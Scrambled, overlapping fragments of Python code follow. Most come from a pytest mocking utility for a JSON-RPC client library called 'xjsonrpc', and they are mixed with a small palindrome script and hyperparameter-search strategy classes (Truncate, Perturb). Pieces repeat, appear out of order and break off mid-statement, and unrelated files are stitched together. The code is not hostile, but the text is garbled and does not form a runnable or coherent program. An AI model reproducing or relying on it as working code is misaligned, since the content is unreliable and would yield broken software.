xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint,", "PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests", "= None, idx: int = 0, ): \"\"\" Replaces a previously added response", "**kwargs: Any): endpoint = origin_self._endpoint matches = self._matches.get(endpoint) if matches is None: if", "tuple)): response = xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params,", "def start(self): \"\"\" Activates a patcher. \"\"\" patcher = self._mocker.patch(self._target) with patcher: if", "request.method, request.params, request.id) if self._async_resp: async def wrapper(): return json.dumps(response.to_json()) return wrapper() else:", "stub(*params) else: stub(**params) if match.callback: if isinstance(params, (list, tuple)): result = match.callback(*params) else:", "-> Response: matches = self._matches[endpoint].get((version, method_name)) if matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name))", "client library integration. Implements some utilities for mocking out ``xjsonrpc`` library clients. \"\"\"", "to the original method \"\"\" def __init__(self, target, mocker=unittest.mock, passthrough: bool = False):", "Any, Callable, Dict, Optional, Union import pytest import xjsonrpc from xjsonrpc import Response", "method \"\"\" def __init__(self, target, mocker=unittest.mock, passthrough: bool = False): self._target = target", ":param callback: patched request callback :param idx: patch index (if there are more", "is_notification, **kwargs) else: raise ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data, (list, tuple)): response", "self.endpoint = endpoint self.version = version self.method_name = method_name self.once = once self.callback", "= match.callback(*params) else: result = match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id", "calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates a patcher. \"\"\" patcher = self._mocker.patch(self._target)", "patch. :param endpoint: request endpoint :param method_name: method name :param version: JSON-RPC request", "request id :param version: patched request version :param once: if ``True`` the patch", "one) \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version,", "= self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return result def reset(self) -> None: \"\"\"", "deleted after the first call :param callback: patched request callback :param idx: patch", "def _cleanup_matches(self, endpoint: str, version: str = '2.0', method_name: Optional[str] = None) ->", "will be deleted after the first call :param callback: patched request callback :param", "more than one) \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error,", "Optional[Callable], **response_data: Any, ): self.endpoint = endpoint self.version = version self.method_name = method_name", "else: request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method, request.params, request.id) if self._async_resp:", "callback: Optional[Callable] = None, idx: int = 0, ): \"\"\" Replaces a previously", "else: return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start() return", "request.id), ) else: request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method, request.params, request.id)", "method_name: method name :param version: JSON-RPC request version :returns: removed response patch \"\"\"", "match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], )", "bool = False): self._target = target self._mocker = mocker self._patcher = None self._async_resp", "information. \"\"\" def __init__( self, endpoint: str, version: str, method_name: str, once: bool,", "by a new one. :param endpoint: request endpoint :param method_name: method name :param", "if not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda", "method_name: Optional[str] = None, version: str = '2.0'): \"\"\" Removes a previously added", "0, ): \"\"\" Replaces a previously added response patch by a new one.", "version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint:", "for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id), ) else: request", "self._matches[endpoint][(version, method_name)][idx] = match def remove(self, endpoint: str, method_name: Optional[str] = None, version:", "xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id), ) else:", "def remove(self, endpoint: str, method_name: Optional[str] = None, version: str = '2.0'): \"\"\"", "version :returns: removed response patch \"\"\" if method_name is None: result = self._matches.pop(endpoint)", "request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id), ) else: request =", "with PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking", "collections.defaultdict(dict) @property def calls(self) -> Dict: \"\"\" Dictionary of JSON-PRC method calls. \"\"\"", "else: stub(**params) if match.callback: if isinstance(params, (list, tuple)): result = match.callback(*params) else: result", "isinstance(params, (list, tuple)): result = match.callback(*params) else: result = match.callback(**params) return xjsonrpc.Response(id=id, result=result)", "= '2.0', once: bool = False, callback: Optional[Callable] = None, idx: int =", "): \"\"\" Replaces a previously added response patch by a new one. :param", "= Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace(", "True if self._async_resp: async def side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs) else: def", "None: \"\"\" Appends response patch. If the same method patch already exists they", "index (if there are more than one) \"\"\" match = Match(endpoint, version, method_name,", "a previously added response patch. :param endpoint: request endpoint :param method_name: method name", "idx: int = 0, ): \"\"\" Replaces a previously added response patch by", "error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def remove(self, endpoint: str, method_name: Optional[str] =", "name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)): stub(*params) else: stub(**params) if match.callback: if isinstance(params,", "import unittest.mock from typing import Any, Callable, Dict, Optional, Union import pytest import", "xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture. \"\"\" with PjRpcRequestsMocker() as mocker: yield mocker", "self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return result def reset(self)", "): self.endpoint = endpoint self.version = version self.method_name = method_name self.once = once", "self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str, version: str = '2.0', method_name: Optional[str] =", "def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture. \"\"\" with PjRpcRequestsMocker() as mocker: yield", "def _match_request( self, endpoint: str, version: str, method_name: str, params: Optional[Union[list, dict]], id:", "version: patched request version :param once: if ``True`` the patch will be deleted", "response patch by a new one. :param endpoint: request endpoint :param method_name: method", "version: str = '2.0', once: bool = False, callback: Optional[Callable] = None, )", "xjsonrpc.common import UNSET, UnsetType class Match: \"\"\" Match object. Incorporates request matching information.", "@pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture. \"\"\" with PjRpcRequestsMocker() as mocker:", "remove(self, endpoint: str, method_name: Optional[str] = None, version: str = '2.0'): \"\"\" Removes", "method_name: method name :param result: patched result :param error: patched error :param id:", "method_name) stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if", "\"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx]", "Match object. Incorporates request matching information. \"\"\" def __init__( self, endpoint: str, version:", "'2.0', once: bool = False, callback: Optional[Callable] = None, idx: int = 0,", ":returns: removed response patch \"\"\" if method_name is None: result = self._matches.pop(endpoint) else:", "request_text: str, is_notification: bool = False, **kwargs: Any): endpoint = origin_self._endpoint matches =", "matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not match.once: matches.append(match)", "self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return result def reset(self) -> None: \"\"\" Removes", "statistics. \"\"\" self._matches.clear() for calls in self._calls.values(): for stub in calls.values(): stub.reset_mock() self._calls.clear()", "request version :param once: if ``True`` the patch will be deleted after the", "class PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker. :param target: method to be mocked", "request callback \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback)", "endpoint: str, method_name: Optional[str] = None, version: str = '2.0'): \"\"\" Removes a", "the first call :param callback: patched request callback :param idx: patch index (if", "already exists they will be used in a round-robin way. :param endpoint: request", "calls in self._calls.values(): for stub in calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates", "@pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture. \"\"\" with PjRpcAiohttpMocker() as mocker:", "xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id), ) else: request = xjsonrpc.Request.from_json(json_data) response", "self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise ConnectionRefusedError() json_data = json.loads(request_text) if", "Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self,", "str = '2.0', once: bool = False, callback: Optional[Callable] = None, ) ->", "if method_name is None: result = self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint,", "= passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property def", "(version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)): stub(*params)", "not mocked requests to the original method \"\"\" def __init__(self, target, mocker=unittest.mock, passthrough:", "idx: patch index (if there are more than one) \"\"\" match = Match(endpoint,", "\"\"\" def __init__( self, endpoint: str, version: str, method_name: str, once: bool, callback:", "None self._async_resp = False self._passthrough = passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls:", "``xjsonrpc`` library clients. \"\"\" import asyncio import collections import functools as ft import", "if not matches: self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self:", "reset call statistics. \"\"\" self._matches.clear() for calls in self._calls.values(): for stub in calls.values():", "None: matches = self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version, method_name), None) if not", "import Response from xjsonrpc.common import UNSET, UnsetType class Match: \"\"\" Match object. Incorporates", "response = xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id),", "Implements some utilities for mocking out ``xjsonrpc`` library clients. \"\"\" import asyncio import", "= False): self._target = target self._mocker = mocker self._patcher = None self._async_resp =", "-> Dict: \"\"\" Dictionary of JSON-PRC method calls. \"\"\" return self._calls def add(", "self._matches.clear() for calls in self._calls.values(): for stub in calls.values(): stub.reset_mock() self._calls.clear() def start(self):", "None, version: str = '2.0'): \"\"\" Removes a previously added response patch. :param", "self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self) -> None: \"\"\" Stop an active", "asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp: async def side_effect(*args, **kwargs): return await self._on_request(*args,", "= endpoint self.version = version self.method_name = method_name self.once = once self.callback =", "request.version, request.method, request.params, request.id), ) else: request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version,", "if matches is None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise", "= target self._mocker = mocker self._patcher = None self._async_resp = False self._passthrough =", "some utilities for mocking out ``xjsonrpc`` library clients. \"\"\" import asyncio import collections", "json_data = json.loads(request_text) if isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse() for request in", "If the same method patch already exists they will be used in a", "package :param passthrough: pass not mocked requests to the original method \"\"\" def", "bool = False, callback: Optional[Callable] = None, ) -> None: \"\"\" Appends response", "None, version: str = '2.0', once: bool = False, callback: Optional[Callable] = None,", "self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect,", "'2.0'): \"\"\" Removes a previously added response patch. :param endpoint: request endpoint :param", "method_name) return result def reset(self) -> None: \"\"\" Removes all added matches and", "= None, version: str = '2.0'): \"\"\" Removes a previously added response patch.", "self.version = version self.method_name = method_name self.once = once self.callback = callback self.response_data", "\"\"\" Synchronous JSON-RPC client mocker. :param target: method to be mocked :param mocker:", "method name :param result: patched result :param error: patched error :param id: patched", "if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise ConnectionRefusedError() json_data = json.loads(request_text)", "round-robin way. :param endpoint: request endpoint :param method_name: method name :param result: patched", "= json.loads(request_text) if isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data):", "def __exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request')", "Removes a previously added response patch. :param endpoint: request endpoint :param method_name: method", "= self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint)", "call :param callback: patched request callback :param idx: patch index (if there are", "not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args,", "__enter__(self): self.start() return self def __exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset() # shortcuts", "wrapper(): return json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json()) def _match_request( self, endpoint: str,", "if asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp: async def side_effect(*args, **kwargs): return await", "return wrapper() else: return json.dumps(response.to_json()) def _match_request( self, endpoint: str, version: str, method_name:", "str, result: UnsetType = UNSET, error: UnsetType = UNSET, id: Optional[Union[int, str]] =", "self._match_request(endpoint, request.version, request.method, request.params, request.id), ) else: request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint,", "= 0, ): \"\"\" Replaces a previously added response patch by a new", "patch by a new one. :param endpoint: request endpoint :param method_name: method name", "a round-robin way. :param endpoint: request endpoint :param method_name: method name :param result:", "False, **kwargs: Any): endpoint = origin_self._endpoint matches = self._matches.get(endpoint) if matches is None:", "Dict = collections.defaultdict(dict) @property def calls(self) -> Dict: \"\"\" Dictionary of JSON-PRC method", "side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self) -> None: \"\"\" Stop an active patcher.", "there are more than one) \"\"\" match = Match(endpoint, version, method_name, once, id=id,", "result=result) else: return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start()", "= False, callback: Optional[Callable] = None, ) -> None: \"\"\" Appends response patch.", "= Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match", "side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def", "= False, **kwargs: Any): endpoint = origin_self._endpoint matches = self._matches.get(endpoint) if matches is", "stub(**params) if match.callback: if isinstance(params, (list, tuple)): result = match.callback(*params) else: result =", "else: def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return", "import functools as ft import json import unittest.mock from typing import Any, Callable,", "stop(self) -> None: \"\"\" Stop an active patcher. \"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self,", "Match: \"\"\" Match object. Incorporates request matching information. \"\"\" def __init__( self, endpoint:", "utilities for mocking out ``xjsonrpc`` library clients. \"\"\" import asyncio import collections import", "a previously added response patch by a new one. :param endpoint: request endpoint", "self._async_resp = False self._passthrough = passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict", "-> None: matches = self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version, method_name), None) if", "name :param version: JSON-RPC request version :returns: removed response patch \"\"\" if method_name", "Appends response patch. If the same method patch already exists they will be", "result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return result def reset(self) -> None:", "or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start() return self def __exit__(self, exc_type,", "\"\"\" with PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client", "functools as ft import json import unittest.mock from typing import Any, Callable, Dict,", "= UNSET, error: UnsetType = UNSET, id: Optional[Union[int, str]] = None, version: str", ") def __enter__(self): self.start() return self def __exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset()", "__init__( self, endpoint: str, version: str, method_name: str, once: bool, callback: Optional[Callable], **response_data:", "self._passthrough = passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property", "callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint: str, method_name: str, result: UnsetType =", "match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] =", "self.response_data = response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker. :param target: method", "= response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker. :param target: method to", "**kwargs): return await self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher", "Dictionary of JSON-PRC method calls. \"\"\" return self._calls def add( self, endpoint: str,", "__init__(self, target, mocker=unittest.mock, passthrough: bool = False): self._target = target self._mocker = mocker", "return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self) ->", "def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start()" ]
[ "inp = input(\"Enter a number or word: \") if inp[::-1].lower() == inp.lower(): print(\"Palindrome\")", "= input(\"Enter a number or word: \") if inp[::-1].lower() == inp.lower(): print(\"Palindrome\") else:", "input(\"Enter a number or word: \") if inp[::-1].lower() == inp.lower(): print(\"Palindrome\") else: print(\"Not", "a number or word: \") if inp[::-1].lower() == inp.lower(): print(\"Palindrome\") else: print(\"Not Palindrome\")", "<reponame>AgnirudraSil/tetris<filename>scripts/temp/palindrome.py inp = input(\"Enter a number or word: \") if inp[::-1].lower() == inp.lower():" ]
[ "that are considered to be \"best\" jobs, and \"worst\" jobs. For example, if", "proportion def _get_params(self): return self.proportion @classmethod def _from_params(cls, params): proportion = float(params) return", "other): return type(self) == type(other) and \\ self.proportion == other.proportion class Perturb(object): _EXPLORE_STRATEGY_NAME", "other.proportion class Perturb(object): _EXPLORE_STRATEGY_NAME = 'perturb' def __init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb explore", "cls(min_factor, max_factor) def __eq__(self, other): return type(self) == type(other) and \\ self.min_factor ==", "example, if ``proportion = 0.2``, if the selected candidate job is in the", "satisfy ``0 < proportion <= 0.5``. ''' self.proportion = proportion def _get_params(self): return", "0.5``. ''' self.proportion = proportion def _get_params(self): return self.proportion @classmethod def _from_params(cls, params):", "hyperparameter by a random factor, sampled from a uniform distribution. Args: min_factor (float):", "} @classmethod def _from_params(cls, params): min_factor = float(params['minFactor']) max_factor = float(params['maxFactor']) return cls(min_factor,", "in [ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for strat in [ Perturb", "in the worst n%, use a candidate job in the top n% instead.", "float(params['maxFactor']) return cls(min_factor, max_factor) def __eq__(self, other): return type(self) == type(other) and \\", "for strat in [ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for strat in", "the factor (inclusive). max_factor (float): Maximum value for the factor (exclusive). ''' self.min_factor", "if ``proportion = 0.2``, if the selected candidate job is in the bottom", "is in the bottom 20%, it will be replaced by a job in", "type(other) and \\ self.proportion == other.proportion class Perturb(object): _EXPLORE_STRATEGY_NAME = 'perturb' def __init__(self,", "proportion=0.2): ''' Truncate exploit strategy: if the selected candidate job is in the", "other.min_factor and \\ self.max_factor == other.max_factor _EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat in", "in the top 20%. Must satisfy ``0 < proportion <= 0.5``. ''' self.proportion", "for the factor (exclusive). ''' self.min_factor = min_factor self.max_factor = max_factor def _get_params(self):", "= min_factor self.max_factor = max_factor def _get_params(self): return { 'minFactor': float(self.min_factor), 'maxFactor': float(self.max_factor),", "min_factor self.max_factor = max_factor def _get_params(self): return { 'minFactor': float(self.min_factor), 'maxFactor': float(self.max_factor), }", "strat for strat in [ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for strat", "float(self.max_factor), } @classmethod def _from_params(cls, params): min_factor = float(params['minFactor']) max_factor = float(params['maxFactor']) return", "other.max_factor _EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat in [ Truncate ]} _EXPLORE_STRATEGIES =", "_EXPLORE_STRATEGY_NAME = 'perturb' def __init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb explore strategy: multiply the", "designated hyperparameter by a random factor, sampled from a uniform distribution. Args: min_factor", "use a candidate job in the top n% instead. Args: proportion (float): Proportion", "== type(other) and \\ self.proportion == other.proportion class Perturb(object): _EXPLORE_STRATEGY_NAME = 'perturb' def", "strat in [ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for strat in [", "proportion <= 0.5``. ''' self.proportion = proportion def _get_params(self): return self.proportion @classmethod def", "_from_params(cls, params): proportion = float(params) return cls(proportion) def __eq__(self, other): return type(self) ==", "min_factor = float(params['minFactor']) max_factor = float(params['maxFactor']) return cls(min_factor, max_factor) def __eq__(self, other): return", "objective MAXIMIZE = 'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate' def __init__(self, proportion=0.2): '''", "def __eq__(self, other): return type(self) == type(other) and \\ self.proportion == other.proportion class", "candidate job is in the bottom 20%, it will be replaced by a", "__init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb explore strategy: multiply the designated hyperparameter by a", "the selected candidate job is in the bottom 20%, it will be replaced", "return { 'minFactor': float(self.min_factor), 'maxFactor': float(self.max_factor), } @classmethod def _from_params(cls, params): min_factor =", "def __eq__(self, other): return type(self) == type(other) and \\ self.min_factor == other.min_factor and", "-*- coding: utf-8 -*- from __future__ import absolute_import, division, print_function, unicode_literals #: Minimize", "return cls(proportion) def __eq__(self, other): return type(self) == type(other) and \\ self.proportion ==", "For example, if ``proportion = 0.2``, if the selected candidate job is in", "# -*- coding: utf-8 -*- from __future__ import absolute_import, division, print_function, unicode_literals #:", "Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate' def __init__(self, proportion=0.2): ''' Truncate exploit strategy: if the", "20%, it will be replaced by a job in the top 20%. Must", "the objective MINIMIZE = 'min' #: Maximize the objective MAXIMIZE = 'max' class", "class Perturb(object): _EXPLORE_STRATEGY_NAME = 'perturb' def __init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb explore strategy:", "instead. Args: proportion (float): Proportion of jobs that are considered to be \"best\"", "exploit strategy: if the selected candidate job is in the worst n%, use", "strategy: multiply the designated hyperparameter by a random factor, sampled from a uniform", "(inclusive). max_factor (float): Maximum value for the factor (exclusive). ''' self.min_factor = min_factor", "Perturb explore strategy: multiply the designated hyperparameter by a random factor, sampled from", "coding: utf-8 -*- from __future__ import absolute_import, division, print_function, unicode_literals #: Minimize the", "{strat._EXPLOIT_STRATEGY_NAME: strat for strat in [ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for", "the objective MAXIMIZE = 'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate' def __init__(self, proportion=0.2):", "the bottom 20%, it will be replaced by a job in the top", "float(self.min_factor), 'maxFactor': float(self.max_factor), } @classmethod def _from_params(cls, params): min_factor = float(params['minFactor']) max_factor =", "``proportion = 0.2``, if the selected candidate job is in the bottom 20%,", "in the bottom 20%, it will be replaced by a job in the", "Maximize the objective MAXIMIZE = 'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate' def __init__(self,", "= proportion def _get_params(self): return self.proportion @classmethod def _from_params(cls, params): proportion = float(params)", "= 'perturb' def __init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb explore strategy: multiply the designated", "will be replaced by a job in the top 20%. Must satisfy ``0", "''' self.proportion = proportion def _get_params(self): return self.proportion @classmethod def _from_params(cls, params): proportion", "min_factor (float): Minimum value for the factor (inclusive). max_factor (float): Maximum value for", "MAXIMIZE = 'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME = 'truncate' def __init__(self, proportion=0.2): ''' Truncate", "of jobs that are considered to be \"best\" jobs, and \"worst\" jobs. For", "multiply the designated hyperparameter by a random factor, sampled from a uniform distribution.", "params): min_factor = float(params['minFactor']) max_factor = float(params['maxFactor']) return cls(min_factor, max_factor) def __eq__(self, other):", "is in the worst n%, use a candidate job in the top n%", "job in the top 20%. Must satisfy ``0 < proportion <= 0.5``. '''", "_from_params(cls, params): min_factor = float(params['minFactor']) max_factor = float(params['maxFactor']) return cls(min_factor, max_factor) def __eq__(self,", "to be \"best\" jobs, and \"worst\" jobs. For example, if ``proportion = 0.2``,", "#: Minimize the objective MINIMIZE = 'min' #: Maximize the objective MAXIMIZE =", "min_factor=0.8, max_factor=1.2): ''' Perturb explore strategy: multiply the designated hyperparameter by a random", "other): return type(self) == type(other) and \\ self.min_factor == other.min_factor and \\ self.max_factor", "Must satisfy ``0 < proportion <= 0.5``. ''' self.proportion = proportion def _get_params(self):", "-*- from __future__ import absolute_import, division, print_function, unicode_literals #: Minimize the objective MINIMIZE", "(exclusive). ''' self.min_factor = min_factor self.max_factor = max_factor def _get_params(self): return { 'minFactor':", "_get_params(self): return { 'minFactor': float(self.min_factor), 'maxFactor': float(self.max_factor), } @classmethod def _from_params(cls, params): min_factor", "utf-8 -*- from __future__ import absolute_import, division, print_function, unicode_literals #: Minimize the objective", "jobs that are considered to be \"best\" jobs, and \"worst\" jobs. For example,", "Args: min_factor (float): Minimum value for the factor (inclusive). max_factor (float): Maximum value", "max_factor (float): Maximum value for the factor (exclusive). ''' self.min_factor = min_factor self.max_factor", "print_function, unicode_literals #: Minimize the objective MINIMIZE = 'min' #: Maximize the objective", "distribution. Args: min_factor (float): Minimum value for the factor (inclusive). max_factor (float): Maximum", "_EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat in [ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME:", "type(self) == type(other) and \\ self.min_factor == other.min_factor and \\ self.max_factor == other.max_factor", "= 0.2``, if the selected candidate job is in the bottom 20%, it", "''' self.min_factor = min_factor self.max_factor = max_factor def _get_params(self): return { 'minFactor': float(self.min_factor),", "if the selected candidate job is in the worst n%, use a candidate", "top 20%. Must satisfy ``0 < proportion <= 0.5``. ''' self.proportion = proportion", "from a uniform distribution. Args: min_factor (float): Minimum value for the factor (inclusive).", "jobs. For example, if ``proportion = 0.2``, if the selected candidate job is", "be \"best\" jobs, and \"worst\" jobs. For example, if ``proportion = 0.2``, if", "[ Truncate ]} _EXPLORE_STRATEGIES = {strat._EXPLORE_STRATEGY_NAME: strat for strat in [ Perturb ]}", "division, print_function, unicode_literals #: Minimize the objective MINIMIZE = 'min' #: Maximize the", "__eq__(self, other): return type(self) == type(other) and \\ self.min_factor == other.min_factor and \\", "= float(params) return cls(proportion) def __eq__(self, other): return type(self) == type(other) and \\", "self.min_factor = min_factor self.max_factor = max_factor def _get_params(self): return { 'minFactor': float(self.min_factor), 'maxFactor':", "by a random factor, sampled from a uniform distribution. Args: min_factor (float): Minimum", "unicode_literals #: Minimize the objective MINIMIZE = 'min' #: Maximize the objective MAXIMIZE", "\\ self.min_factor == other.min_factor and \\ self.max_factor == other.max_factor _EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat", "self.max_factor == other.max_factor _EXPLOIT_STRATEGIES = {strat._EXPLOIT_STRATEGY_NAME: strat for strat in [ Truncate ]}", "considered to be \"best\" jobs, and \"worst\" jobs. For example, if ``proportion =", "cls(proportion) def __eq__(self, other): return type(self) == type(other) and \\ self.proportion == other.proportion", "Maximum value for the factor (exclusive). ''' self.min_factor = min_factor self.max_factor = max_factor", "jobs, and \"worst\" jobs. For example, if ``proportion = 0.2``, if the selected", "'perturb' def __init__(self, min_factor=0.8, max_factor=1.2): ''' Perturb explore strategy: multiply the designated hyperparameter", "factor (inclusive). max_factor (float): Maximum value for the factor (exclusive). ''' self.min_factor =", "for the factor (inclusive). max_factor (float): Maximum value for the factor (exclusive). '''", "job is in the bottom 20%, it will be replaced by a job", "MINIMIZE = 'min' #: Maximize the objective MAXIMIZE = 'max' class Truncate(object): _EXPLOIT_STRATEGY_NAME", "candidate job in the top n% instead. Args: proportion (float): Proportion of jobs", "(float): Proportion of jobs that are considered to be \"best\" jobs, and \"worst\"", "max_factor def _get_params(self): return { 'minFactor': float(self.min_factor), 'maxFactor': 